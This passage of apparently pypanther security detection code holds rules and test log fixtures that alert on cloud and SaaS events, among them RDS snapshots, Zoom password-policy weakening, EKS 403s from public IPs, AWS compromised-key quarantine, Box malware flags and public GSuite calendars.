                event.get("eventSource", "") == "rds.amazonaws.com",
                event.get("eventName", "") == "CreateDBSnapshot",
                event.deep_get("responseElements", "snapshotType") in {"manual", "public"},
            ],
        )

    def title(self, event):
        account_id = event.get("recipientAccountId", "")
        rds_instance_id = event.deep_get("responseElements", "dBInstanceIdentifier")
        return f"Manual RDS Snapshot Created in [{account_id}] for RDS instance [{rds_instance_id}]"

    def alert_context(self, event):
        return aws_rule_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed

zoom_sign_in_requirements_changed_tests: list[RuleTest] = [
    RuleTest(
        name="Setting Change One",
        expected_result=True,
        log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Sign-In Password Requirement  - Include at least 1 letter: from On to Off - Include at least 1 number: from On to Off - Include both uppercase and lowercase characters: from On to Off",
            "operator": "example@example.io",
            "time": "2022-12-16 18:21:29",
        },
    ),
    RuleTest(
        name="Setting Change Two",
        expected_result=True,
        log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Sign-In Password Requirement  - Have at least specified length of characters: from 8 to 14 - Include at least 1 letter: from On to Off - Include at least 1 number: from On to Off - Include both uppercase and lowercase characters: from On to Off",
            "operator": "example@example.io",
            "time": "2022-12-16 18:21:23",
        },
    ),
    RuleTest(
        name="2FA disabled",
        expected_result=False,
        log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Security  - Sign in with Two-Factor Authentication: from On to Off",
            "operator": "example@example.io",
            "time": "2022-12-16 18:20:35",
        },
    ),
    RuleTest(
        name="Setting Change Off to On",
        expected_result=False,
        log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Sign-In Password Requirement  - Have at least specified length of characters: from 8 to 14 - Include at least 1 letter: from Off to On - Include at least 1 number: from Off to On - Include both uppercase and lowercase characters: from Off to On",
            "operator": "example@example.io",
            "time": "2022-12-16 18:21:23",
        },
    ),
]


@panther_managed
class ZoomSignInRequirementsChanged(Rule):
    default_description = "A Zoom User changed your organization's sign in requirements. "
    display_name = "Zoom Sign In Requirements Changed"
    default_runbook = (
        "Confirm this user acted with valid business intent and determine whether this activity was authorized."
    )
    default_reference = "https://support.zoom.com/hc/en/article?id=zm_kb&sysparm_article=KB0061263"
    default_severity = Severity.MEDIUM
    log_types = [LogType.ZOOM_OPERATION]
    id = "Zoom.Sign.In.Requirements.Changed-prototype"
    summary_attributes = ["operation_detail"]
    tests = zoom_sign_in_requirements_changed_tests

    def rule(self, event):
        operation_detail = event.get("operation_detail", "<NO_OPS_DETAIL>")
        operation_flag_one = "Sign-In Password Requirement"
        operation_flag_two = "On to Off"
        return all(
            [
                event.get("action", "<NO_ACTION>") == "Update",
                event.get("category_type", "<NO_CATEGORY_TYPE>") == "Account",
                operation_flag_one in operation_detail,
                operation_flag_two in operation_detail,
            ],
        )

    def title(self, event):
        return f"Zoom User [{event.get('operator', '<NO_OPERATOR>')}] changed your organization's sign in requirements [{event.get('operation_detail', '<NO_OPS_DETAIL>')}]."



from ipaddress import ip_address

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import eks_panther_obj_ref

amazon_eks_audit_multiple403_tests: list[RuleTest] = [
    RuleTest(
        name="Not 403",
        expected_result=False,
        log={
            "annotations": {"authorization.k8s.io/decision": "allow", "authorization.k8s.io/reason": ""},
            "apiVersion": "audit.k8s.io/v1",
            "auditID": "35506555-dffc-4337-b2b1-c4af52b88e18",
            "kind": "Event",
            "level": "Request",
            "objectRef": {
                "apiVersion": "v1",
                "name": "kube-bench-drn4j",
                "namespace": "default",
                "resource": "pods",
                "subresource": "log",
            },
            "p_any_aws_account_ids": ["123412341234"],
            "p_any_aws_arns": [
                "arn:aws:iam::123412341234:role/DevAdministrator",
                "arn:aws:sts::123412341234:assumed-role/DevAdministrator/1669660343296132000",
            ],
            "p_any_ip_addresses": ["5.5.5.5"],
            "p_any_usernames": ["kubernetes-admin"],
            "p_event_time": "2022-11-29 00:09:04.38",
            "p_log_type": "Amazon.EKS.Audit",
            "p_parse_time": "2022-11-29 00:10:25.067",
            "p_row_id": "2e4ab474b0f0f7a4a8fff4f014a9b32a",
            "p_source_id": "4c859cd4-9406-469b-9e0e-c2dc1bee24fa",
            "p_source_label": "example-cluster-eks-logs",
            "requestReceivedTimestamp": "2022-11-29 00:09:04.38",
            "requestURI": "/api/v1/namespaces/default/pods/kube-bench-drn4j/log?container=kube-bench",
            "responseStatus": {"code": 200},
            "sourceIPs": ["5.5.5.5"],
            "stage": "ResponseStarted",
            "stageTimestamp": "2022-11-29 00:09:04.392",
            "user": {
                "extra": {
                    "accessKeyId": ["ASIARLIVEKVNN6Y6J5UW"],
                    "arn": ["arn:aws:sts::123412341234:assumed-role/DevAdministrator/1669660343296132000"],
                    "canonicalArn": ["arn:aws:iam::123412341234:role/DevAdministrator"],
                    "sessionName": ["1669660343296132000"],
                },
                "groups": ["system:masters", "system:authenticated"],
                "uid": "aws-iam-authenticator:123412341234:AROARLIVEKVNIRVGDLJWJ",
                "username": "kubernetes-admin",
            },
            "userAgent": "kubectl/v1.25.4 (darwin/arm64) kubernetes/872a965",
            "verb": "get",
        },
    ),
    RuleTest(
        name="403 and Private IP",
        expected_result=False,
        log={
            "annotations": {
                "authorization.k8s.io/decision": "allow",
                "authorization.k8s.io/reason": 'RBAC: allowed by ClusterRoleBinding "system:coredns" of ClusterRole "system:coredns" to ServiceAccount "coredns/kube-system"',
            },
            "apiVersion": "audit.k8s.io/v1",
            "auditID": "e2626946-90e1-4d0c-829e-ad5a78572926",
            "kind": "Event",
            "level": "Metadata",
            "objectRef": {"apiGroup": "discovery.k8s.io", "apiVersion": "v1", "resource": "endpointslices"},
            "p_any_ip_addresses": ["10.0.27.115"],
            "p_any_usernames": ["system:serviceaccount:kube-system:coredns"],
            "p_event_time": "2022-11-29 22:34:06.892",
            "p_log_type": "Amazon.EKS.Audit",
            "p_parse_time": "2022-11-29 22:45:25.024",
            "p_row_id": "c2a7d8dd7c858dcae0a1aaf314b2a207",
            "p_source_id": "4c859cd4-9406-469b-9e0e-c2dc1bee24fa",
            "p_source_label": "example-cluster-eks-logs",
            "requestReceivedTimestamp": "2022-11-29 22:34:06.892",
            "requestURI": "/apis/discovery.k8s.io/v1/endpointslices?allowWatchBookmarks=true&resourceVersion=2528212&timeout=5m56s&timeoutSeconds=356&watch=true",
            "responseStatus": {"code": 403},
            "sourceIPs": ["10.0.27.115"],
            "stage": "ResponseComplete",
            "stageTimestamp": "2022-11-29 22:40:02.903",
            "user": {
                "extra": {
                    "authentication_kubernetes_io_slash_pod-name": ["coredns-57ff979f67-bl27n"],
                    "authentication_kubernetes_io_slash_pod-uid": ["5b9488ae-5563-42aa-850b-b0d82edb3e22"],
                },
                "groups": ["system:serviceaccounts", "system:serviceaccounts:kube-system", "system:authenticated"],
                "uid": "5e4461f9-f529-4e66-9343-0b0cc9452284",
                "username": "system:serviceaccount:kube-system:coredns",
            },
            "userAgent": "Go-http-client/2.0",
            "verb": "watch",
        },
    ),
    RuleTest(
        name="403 and Public IP",
        expected_result=True,
        log={
            "annotations": {
                "authorization.k8s.io/decision": "allow",
                "authorization.k8s.io/reason": 'RBAC: allowed by ClusterRoleBinding "system:coredns" of ClusterRole "system:coredns" to ServiceAccount "coredns/kube-system"',
            },
            "apiVersion": "audit.k8s.io/v1",
            "auditID": "e2626946-90e1-4d0c-829e-ad5a78572926",
            "kind": "Event",
            "level": "Metadata",
            "objectRef": {"apiGroup": "discovery.k8s.io", "apiVersion": "v1", "resource": "endpointslices"},
            "p_any_ip_addresses": ["5.5.5.5"],
            "p_any_usernames": ["system:serviceaccount:kube-system:coredns"],
            "p_event_time": "2022-11-29 22:34:06.892",
            "p_log_type": "Amazon.EKS.Audit",
            "p_parse_time": "2022-11-29 22:45:25.024",
            "p_row_id": "c2a7d8dd7c858dcae0a1aaf314b2a207",
            "p_source_id": "4c859cd4-9406-469b-9e0e-c2dc1bee24fa",
            "p_source_label": "example-cluster-eks-logs",
            "requestReceivedTimestamp": "2022-11-29 22:34:06.892",
            "requestURI": "/apis/discovery.k8s.io/v1/endpointslices?allowWatchBookmarks=true&resourceVersion=2528212&timeout=5m56s&timeoutSeconds=356&watch=true",
            "responseStatus": {"code": 403},
            "sourceIPs": ["5.5.5.5"],
            "stage": "ResponseComplete",
            "stageTimestamp": "2022-11-29 22:40:02.903",
            "user": {
                "extra": {
                    "authentication_kubernetes_io_slash_pod-name": ["coredns-57ff979f67-bl27n"],
                    "authentication_kubernetes_io_slash_pod-uid": ["5b9488ae-5563-42aa-850b-b0d82edb3e22"],
                },
                "groups": ["system:serviceaccounts", "system:serviceaccounts:kube-system", "system:authenticated"],
                "uid": "5e4461f9-f529-4e66-9343-0b0cc9452284",
                "username": "system:serviceaccount:kube-system:coredns",
            },
            "userAgent": "Go-http-client/2.0",
            "verb": "watch",
        },
    ),
]


@panther_managed
class AmazonEKSAuditMultiple403(Rule):
    id = "Amazon.EKS.Audit.Multiple403-prototype"
    display_name = "EKS Audit Log based single sourceIP is generating multiple 403s"
    log_types = [LogType.AMAZON_EKS_AUDIT]
    tags = ["EKS"]
    reports = {"MITRE ATT&CK": ["TA0007:T1613"]}
    default_reference = "https://aws.github.io/aws-eks-best-practices/security/docs/detective/"
    default_severity = Severity.INFO
    default_description = (
        "This detection identifies if a public sourceIP is generating multiple 403s with the Kubernetes API server.\n"
    )
    dedup_period_minutes = 30
    threshold = 10
    summary_attributes = ["user:username", "p_any_ip_addresses", "p_source_label"]
    tests = amazon_eks_audit_multiple403_tests
    # Alert if
    #   state is ResponseComplete
    #   sourceIPs[0] is a Public Address
    #   responseStatus:code == 403
    # If not defined, defaults to the rule display name or rule ID.

    def rule(self, event):
        if event.get("stage", "") != "ResponseComplete":
            return False
        # We include only 403
        if event.get("responseStatus", {}).get("code", 0) != 403:
            return False
        # And we only want things that might naively be kubernetes api endpoints
        # we do not want to alert on scanners casting non-kubernetes requests.
        if not event.get("requestURI", "").startswith(("/api/", "/apis/")):
            return False
        p_eks = eks_panther_obj_ref(event)
        if not ip_address(p_eks.get("sourceIPs")[0]).is_global:
            return False
        return True

    def title(self, event):
        p_eks = eks_panther_obj_ref(event)
        return f"[{p_eks.get('sourceIPs')[0]}] received [403] when executing [{p_eks.get('verb')}] for resource [{p_eks.get('resource')}] in ns [{p_eks.get('ns')}] on [{p_eks.get('p_source_label')}] as [{p_eks.get('actor')}]"

    def dedup(self, event):
        p_eks = eks_panther_obj_ref(event)
        return f"{p_eks.get('p_source_label')}_403_{p_eks.get('sourceIPs')[0]}"

    def alert_context(self, event):
        p_eks = eks_panther_obj_ref(event)
        mutable_event = event.to_dict()
        mutable_event["p_eks"] = p_eks
        return dict(mutable_event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed

aws_cloud_trail_iam_compromised_key_quarantine_tests: list[RuleTest] = [
    RuleTest(
        name="AttachUserPolicy AWSCompromisedKeyQuarantineV2-true",
        expected_result=True,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "FAKE_PRINCIPAL:user.name",
                "arn": "arn:aws:sts::123456789012:assumed-role/a-role/user.name",
                "accountId": "123456789012",
                "accessKeyId": "FAKE_ACCESS_KEY",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "FAKE_PRINCIPAL",
                        "arn": "arn:aws:iam::123456789012:role/a-role",
                        "accountId": "123456789012",
                        "userName": "a-role",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-11-21T22:28:31Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-11-21T23:23:52Z",
            "eventSource": "iam.amazonaws.com",
            "eventName": "AttachUserPolicy",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "1.2.3.4",
            "userAgent": "AWS Internal",
            "requestParameters": {
                "userName": "test-user",
                "policyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantineV2",
            },
            "responseElements": None,
            "requestID": "a2468e00-2b3c-4696-8056-327a624b5887",
            "eventID": "e7bb4b23-66e1-4656-b607-f575fde3b790",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "sessionCredentialFromConsole": "true",
        },
    ),
    RuleTest(
        name="PutUserPolicy-false",
        expected_result=False,
        log={
            "eventVersion": "1.08",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "FAKE_PRINCIPAL:evan.gibler",
                "arn": "arn:aws:sts::123456789012:assumed-role/a-role/user.name",
                "accountId": "123456789012",
                "accessKeyId": "FAKE_ACCESS_KEY",
                "sessionContext": {
                    "sessionIssuer": {
                        "type": "Role",
                        "principalId": "FAKE_PRINCIPAL",
                        "arn": "arn:aws:iam::123456789012:role/a-role",
                        "accountId": "123456789012",
                        "userName": "a-role",
                    },
                    "webIdFederationData": {},
                    "attributes": {"creationDate": "2023-11-21T22:28:31Z", "mfaAuthenticated": "false"},
                },
            },
            "eventTime": "2023-11-21T23:31:17Z",
            "eventSource": "iam.amazonaws.com",
            "eventName": "PutUserPolicy",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "136.32.237.81",
            "userAgent": "AWS Internal",
            "requestParameters": {
                "userName": "test-user",
                "policyName": "TestUserDenyAll",
                "policyDocument": '{\n\t"Version": "2012-10-17",\n\t"Statement": [\n\t\t{\n\t\t\t"Sid": "TestUserDenyAll",\n\t\t\t"Effect": "Deny",\n\t\t\t"Action": ["*"],\n\t\t\t"Resource": ["*"]\n\t\t}\n\t]\n}',
            },
            "responseElements": None,
            "requestID": "2f59fa44-615c-40b7-a31f-01401e523663",
            "eventID": "7ee6ba6e-1943-417a-a6a3-3a2b0292cdac",
            "readOnly": False,
            "eventType": "AwsApiCall",
            "managementEvent": True,
            "recipientAccountId": "123456789012",
            "eventCategory": "Management",
            "sessionCredentialFromConsole": "true",
        },
    ),
]


@panther_managed
class AWSCloudTrailIAMCompromisedKeyQuarantine(Rule):
    log_types = [LogType.AWS_CLOUDTRAIL]
    default_description = (
        "Detects when an IAM user has the AWSCompromisedKeyQuarantineV2 policy attached to their account."
    )
    display_name = "AWS Compromised IAM Key Quarantine"
    id = "AWS.CloudTrail.IAMCompromisedKeyQuarantine-prototype"
    default_severity = Severity.HIGH
    tags = [
        "AWS",
        "Identity and Access Management",
        "Initial Access:Valid Accounts",
        "Credential Access:Unsecured Credentials",
    ]
    reports = {"MITRE ATT&CK": ["TA0001:T1078.004", "TA0006:T1552.001"]}
    default_runbook = "Check the quarantined IAM entity's key usage for signs of compromise and follow the instructions outlined in the AWS support case opened regarding this event.\n"
    default_reference = "https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/"
    tests = aws_cloud_trail_iam_compromised_key_quarantine_tests
    IAM_ACTIONS = {"AttachUserPolicy", "AttachGroupPolicy", "AttachRolePolicy"}
    QUARANTINE_MANAGED_POLICY = "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantineV2"

    def rule(self, event):
        return all(
            [
                event.get("eventSource", "") == "iam.amazonaws.com",
                event.get("eventName", "") in self.IAM_ACTIONS,
                event.deep_get("requestParameters", "policyArn", default="") == self.QUARANTINE_MANAGED_POLICY,
            ],
        )

    def title(self, event):
        account_id = event.deep_get("recipientAccountId", default="<ACCOUNT_ID_NOT_FOUND>")
        user_name = event.deep_get("requestParameters", "userName", default="<USER_NAME_NOT_FOUND>")
        return f"Compromised Key quarantined for [{user_name}] in AWS Account [{account_id}]"



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import box_parse_additional_details, deep_get

box_malicious_content_tests: list[RuleTest] = [
    RuleTest(
        name="Regular Event",
        expected_result=False,
        log={
            "type": "event",
            "additional_details": '{"key": "value"}',
            "created_by": {"id": "12345678", "type": "user", "login": "cat@example", "name": "Bob Cat"},
            "event_type": "DELETE",
        },
    ),
    RuleTest(
        name="File marked malicious",
        expected_result=True,
        log={
            "type": "event",
            "additional_details": '{"key": "value"}',
            "created_by": {"id": "12345678", "type": "user", "login": "cat@example", "name": "Bob Cat"},
            "event_type": "FILE_MARKED_MALICIOUS",
            "source": {
                "item_id": "123456789012",
                "item_name": "bad_file.pdf",
                "item_type": "file",
                "owned_by": {"id": "12345678", "type": "user", "login": "cat@example", "name": "Bob"},
                "parent": {"id": "12345", "type": "folder", "etag": "1", "name": "Parent_Folder", "sequence_id": "2"},
            },
        },
    ),
    RuleTest(
        name="Malicious Content",
        expected_result=True,
        log={
            "type": "event",
            "additional_details": '{"shield_alert":{"rule_category":"Malicious Content","risk_score":100,"alert_summary":{"upload_activity":{"item_name":"malware.exe"}},"user":{"email":"cat@example"}}}',
            "created_by": {"id": 12345678, "type": "user", "login": "bob@example", "name": "Bob Cat"},
            "event_type": "SHIELD_ALERT",
            "source": {"id": 12345678, "type": "user", "login": "bob@example"},
        },
    ),
]


@panther_managed
class BoxMaliciousContent(Rule):
    id = "Box.Malicious.Content-prototype"
    display_name = "Malicious Content Detected"
    log_types = [LogType.BOX_EVENT]
    tags = ["Box", "Execution:User Execution"]
    reports = {"MITRE ATT&CK": ["TA0002:T1204"]}
    default_severity = Severity.HIGH
    default_description = "Box has detect malicious content, such as a virus.\n"
    default_reference = "https://developer.box.com/guides/events/shield-alert-events/\n"
    default_runbook = (
        "Investigate whether this is a false positive or if the virus needs to be contained appropriately.\n"
    )
    summary_attributes = ["event_type"]
    tests = box_malicious_content_tests

    def rule(self, event):
        # enterprise  malicious file alert event
        if event.get("event_type") == "FILE_MARKED_MALICIOUS":
            return True
        # Box Shield will also alert on malicious content
        if event.get("event_type") != "SHIELD_ALERT":
            return False
        alert_details = box_parse_additional_details(event).get("shield_alert", {})
        if alert_details.get("rule_category", "") == "Malicious Content":
            if alert_details.get("risk_score", 0) > 50:
                return True
        return False

    def title(self, event):
        if event.get("event_type") == "FILE_MARKED_MALICIOUS":
            return f"File [{deep_get(event, 'source', 'item_name', default='<UNKNOWN_FILE>')}], owned by [{deep_get(event, 'source', 'owned_by', 'login', default='<UNKNOWN_USER>')}], was marked malicious."
        alert_details = box_parse_additional_details(event).get("shield_alert", {})
        #  pylint: disable=line-too-long
        return f"File [{deep_get(alert_details, 'user', 'email', default='<UNKNOWN_USER>')}], owned by [{deep_get(alert_details, 'alert_summary', 'upload_activity', 'item_name', default='<UNKNOWN_FILE>')}], was marked malicious."



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

g_suite_calendar_made_public_tests: list[RuleTest] = [
    RuleTest(
        name="User Publically Shared a Calendar",
        expected_result=True,
        log={
            "actor": {"email": "user@example.io", "profileId": "110111111111111111111"},
            "id": {
                "applicationName": "calendar",
                "customerId": "D12345",
                "time": "2022-12-10 22:33:31.852000000",
                "uniqueQualifier": "-2888888888888888888",
            },
            "ipAddress": "1.2.3.4",
            "kind": "admin#reports#activity",
            "name": "change_calendar_acls",
            "ownerDomain": "example.io",
            "parameters": {
                "access_level": "freebusy",
                "api_kind": "web",
                "calendar_id": "user@example.io",
                "grantee_email": "__public_principal__@public.calendar.google.com",
                "user_agent": "Mozilla/5.0",
            },
            "type": "calendar_change",
        },
    ),
    RuleTest(
        name="User Made Calendar Private",
        expected_result=True,
        log={
            "actor": {"email": "user@example.io", "profileId": "110111111111111111111"},
            "id": {
                "applicationName": "calendar",
                "customerId": "D12345",
                "time": "2022-12-10 22:33:31.852000000",
                "uniqueQualifier": "-2888888888888888888",
            },
            "ipAddress": "1.2.3.4",
            "kind": "admin#reports#activity",
            "name": "change_calendar_acls",
            "ownerDomain": "example.io",
            "parameters": {
                "access_level": "none",
                "api_kind": "web",
                "calendar_id": "user@example.io",
                "grantee_email": "__public_principal__@public.calendar.google.com",
                "user_agent": "Mozilla/5.0",
            },
            "type": "calendar_change",
        },
    ),
    RuleTest(
        name="Admin Set Default Calendar SHARING_OUTSIDE_DOMAIN Setting to READ_WRITE_ACCESS",
        expected_result=False,
        log={
            "actor": {"callerType": "USER", "email": "example@example.io", "profileId": "12345"},
            "id": {
                "applicationName": "admin",
                "customerId": "D12345",
                "time": "2022-12-11 01:06:26.303000000",
                "uniqueQualifier": "-12345",
            },
            "ipAddress": "12.12.12.12",
            "kind": "admin#reports#activity",
            "name": "CHANGE_CALENDAR_SETTING",
            "parameters": {
                "DOMAIN_NAME": "example.io",
                "NEW_VALUE": "READ_WRITE_ACCESS",
                "OLD_VALUE": "READ_ONLY_ACCESS",
                "ORG_UNIT_NAME": "Example IO",
                "SETTING_NAME": "SHARING_OUTSIDE_DOMAIN",
            },
            "type": "CALENDAR_SETTINGS",
        },
    ),
    RuleTest(
        name="ListObject Type",
        expected_result=False,
        log={
            "actor": {"email": "user@example.io", "profileId": "118111111111111111111"},
            "id": {
                "applicationName": "drive",
                "customerId": "D12345",
                "time": "2022-12-20 17:27:47.080000000",
                "uniqueQualifier": "-7312729053723258069",
            },
            "ipAddress": "12.12.12.12",
            "kind": "admin#reports#activity",
            "name": "rename",
            "parameters": {
                "actor_is_collaborator_account": None,
                "billable": True,
                "doc_id": "1GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG",
                "doc_title": "Document Title- Found Here",
                "doc_type": "presentation",
                "is_encrypted": None,
                "new_value": ["Document Title- Found Here"],
                "old_value": ["Document Title- Old"],
                "owner": "user@example.io",
                "owner_is_shared_drive": None,
                "owner_is_team_drive": None,
                "primary_event": True,
                "visibility": "private",
            },
            "type": "access",
        },
    ),
]


@panther_managed
class GSuiteCalendarMadePublic(Rule):
    id = "GSuite.CalendarMadePublic-prototype"
    display_name = "GSuite Calendar Has Been Made Public"
    log_types = [LogType.GSUITE_ACTIVITY_EVENT]
    tags = ["GSuite"]
    reports = {"MITRE ATT&CK": ["TA0007:T1087"]}
    default_severity = Severity.MEDIUM
    default_description = "A User or Admin Has Modified A Calendar To Be Public\n"
    default_reference = "https://support.google.com/calendar/answer/37083?hl=en&sjid=864417124752637253-EU"
    default_runbook = "Follow up with user about this calendar share.\n"
    summary_attributes = ["actor:email"]
    tests = g_suite_calendar_made_public_tests

    def rule(self, event):
        return (
            event.get("name") == "change_calendar_acls"
            and event.get("parameters", {}).get("grantee_email") == "__public_principal__@public.calendar.google.com"
        )

    def title(self, event):
        return f"GSuite calendar [{deep_get(event, 'parameters', 'calendar_id', default='<NO_CALENDAR_ID>')}] made {self.public_or_private(event)} by [{deep_get(event, 'actor', 'email', default='<NO_ACTOR_FOUND>')}]"

    def severity(self, event):
        return "LOW" if self.public_or_private(event) == "private" else "MEDIUM"

    def public_or_private(self, event):
        return "private" if deep_get(event, "parameters", "access_level") == "none" else "public"



from pypanther.base import DataModel, DataModelMapping, LogType


class StandardAmazonEKSAudit(DataModel):
    id: str = "Standard.Amazon.EKS.Audit"
    display_name: str = "AWS EKS Audit"
    enabled: bool = True
    log_types: list[str] = [LogType.AMAZON_EKS_AUDIT]
    mappings: list[DataModelMapping] = [
        DataModelMapping(name="annotations", path="$.annotations"),
        DataModelMapping(name="apiGroup", path="$.objectRef.apiGroup"),
        DataModelMapping(name="apiVersion", path="$.objectRef.apiVersion"),
        DataModelMapping(name="namespace", path="$.objectRef.namespace"),
        DataModelMapping(name="resource", path="$.objectRef.resource"),
        DataModelMapping(name="name", path="$.objectRef.name"),
        DataModelMapping(name="requestURI", path="$.requestURI"),
        DataModelMapping(name="responseStatus", path="$.responseStatus"),
        DataModelMapping(name="sourceIPs", path="$.sourceIPs"),
        DataModelMapping(name="username", path="$.user.username"),
        DataModelMapping(name="userAgent", path="$.userAgent"),
        DataModelMapping(name="verb", path="$.verb"),
        DataModelMapping(name="requestObject", path="$.requestObject"),
        DataModelMapping(name="responseObject", path="$.responseObject"),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context, pattern_match

awss3_server_access_error_tests: list[RuleTest] = [
    RuleTest(
        name="Amazon Access Error",
        expected_result=False,
        log={
            "authenticationtype": "AuthHeader",
            "bucket": "cloudtrail",
            "bucketowner": "2c8e3610de4102c8e3610de4102c8e3610de410",
            "bytessent": 9438,
            "ciphersuite": "ECDHE-RSA-AES128-SHA",
            "errorcode": "SignatureDoesNotMatch",
            "hostheader": "cloudtrail.s3.us-west-2.amazonaws.com",
            "hostid": "2c8e3610de4102c8e3610de4102c8e3610de410",
            "httpstatus": 403,
            "key": "AWSLogs/o-3h3h3h3h3h/123456789012/CloudTrail/us-east-1/2020/06/21/123456789012_CloudTrail_us-east-1_20200621T2035Z_ZqQWc4WNXOQUiIic.json.gz",
            "operation": "REST.PUT.OBJECT",
            "remoteip": "54.159.198.108",
            "requestid": "8EFD962F22F2A510",
            "requesturi": "PUT /AWSLogs/o-wyibehgf3h/123456789012/CloudTrail/us-east-1/2020/06/21/123456789012_CloudTrail_us-east-1_20200621T2035Z_ZqQWc4WNXOQUiIic.json.gz HTTP/1.1",
            "signatureversion": "SigV4",
            "time": "2020-06-21 20:41:25.000000000",
            "tlsVersion": "TLSv1.2",
            "totaltime": 9,
            "useragent": "aws-internal/3",
        },
    ),
    RuleTest(
        name="Access Error",
        expected_result=True,
        log={
            "bucket": "panther-auditlogs",
            "time": "2020-04-22 07:48:45.000",
            "remoteip": "10.106.38.245",
            "requester": "arn:aws:iam::162777425019:user/awslogsdelivery",
            "requestid": "5CDAB4038253B0E4",
            "operation": "REST.GET.OBJECT",
            "httpstatus": 403,
            "errorcode": "AccessDenied",
            "tlsversion": "TLSv1.2",
        },
    ),
    RuleTest(
        name="403 on HEAD.BUCKET",
        expected_result=False,
        log={
            "bucket": "panther-auditlogs",
            "time": "2020-04-22 07:48:45.000",
            "remoteip": "10.106.38.245",
            "requester": "arn:aws:iam::162777425019:user/awslogsdelivery",
            "requestid": "5CDAB4038253B0E4",
            "operation": "REST.HEAD.BUCKET",
            "httpstatus": 403,
            "errorcode": "InternalServerError",
            "tlsversion": "TLSv1.2",
        },
    ),
    RuleTest(
        name="Internal Server Error",
        expected_result=False,
        log={
            "bucket": "panther-auditlogs",
            "time": "2020-04-22 07:48:45.000",
            "remoteip": "10.106.38.245",
            "requester": "arn:aws:iam::162777425019:user/awslogsdelivery",
            "requestid": "5CDAB4038253B0E4",
            "operation": "REST.HEAD.BUCKET",
            "httpstatus": 500,
            "errorcode": "InternalServerError",
            "tlsversion": "TLSv1.2",
        },
    ),
]


@panther_managed
class AWSS3ServerAccessError(Rule):
    id = "AWS.S3.ServerAccess.Error-prototype"
    display_name = "AWS S3 Access Error"
    dedup_period_minutes = 180
    threshold = 5
    log_types = [LogType.AWS_S3_SERVER_ACCESS]
    tags = ["AWS", "Security Control", "Discovery:Cloud Storage Object Discovery"]
    reports = {"MITRE ATT&CK": ["TA0007:T1619"]}
    default_severity = Severity.INFO
    default_description = "Checks for errors during S3 Object access. This could be due to insufficient access permissions, non-existent buckets, or other reasons.\n"
    default_runbook = "Investigate the specific error and determine if it is an ongoing issue that needs to be addressed or a one off or transient error that can be ignored.\n"
    default_reference = "https://docs.aws.amazon.com/AmazonS3/latest/dev/ErrorCode.html"
    summary_attributes = ["bucket", "key", "requester", "remoteip", "operation", "errorCode"]
    tests = awss3_server_access_error_tests
    # https://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html
    # Forbidden
    # Method Not Allowed
    HTTP_STATUS_CODES_TO_MONITOR = {403, 405}

    def rule(self, event):
        if event.get("useragent", "").startswith("aws-internal"):
            return False
        return (
            pattern_match(event.get("operation", ""), "REST.*.OBJECT")
            and event.get("httpstatus") in self.HTTP_STATUS_CODES_TO_MONITOR
        )

    def title(self, event):
        return f"{event.get('httpstatus')} errors found to S3 Bucket [{event.get('bucket')}]"

    def alert_context(self, event):
        return aws_rule_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.gcp_base_helpers import gcp_alert_context
from pypanther.helpers.panther_base_helpers import deep_get

gcpdns_zone_modifiedor_deleted_tests: list[RuleTest] = [
    RuleTest(
        name="dns.managedZones.delete-should-alert",
        expected_result=True,
        log={
            "insertid": "-xxxxxxxxxxxx",
            "logName": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
                    {"granted": True, "permission": "dns.managedZones.delete", "resourceAttributes": {}},
                ],
                "methodName": "dns.managedZones.delete",
                "request": {
                    "@type": "type.googleapis.com/cloud.dns.api.ManagedZonesDeleteRequest",
                    "managedZone": "test-zone",
                    "project": "test-project-123456",
                },
                "requestMetadata": {
                    "callerIP": "12.12.12.12",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-05-23T19:08:13.820007Z"},
                },
                "resourceName": "managedZones/test-zone",
                "response": {"@type": "type.googleapis.com/cloud.dns.api.ManagedZonesDeleteResponse"},
                "serviceName": "dns.googleapis.com",
                "status": {},
            },
            "receivetimestamp": "2023-05-23 19:08:14.305",
            "resource": {
                "labels": {"location": "global", "project_id": "test-project-123456", "zone_name": "test-zone"},
                "type": "dns_managed_zone",
            },
            "severity": "NOTICE",
            "timestamp": "2023-05-23 19:08:11.697",
        },
    ),
    RuleTest(
        name="dns.managedZones.patch-should-alert",
        expected_result=True,
        log={
            "insertid": "-xxxxxxxxxxxx",
            "logname": "projects/test-project-123456/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@domain.com"},
                "authorizationInfo": [
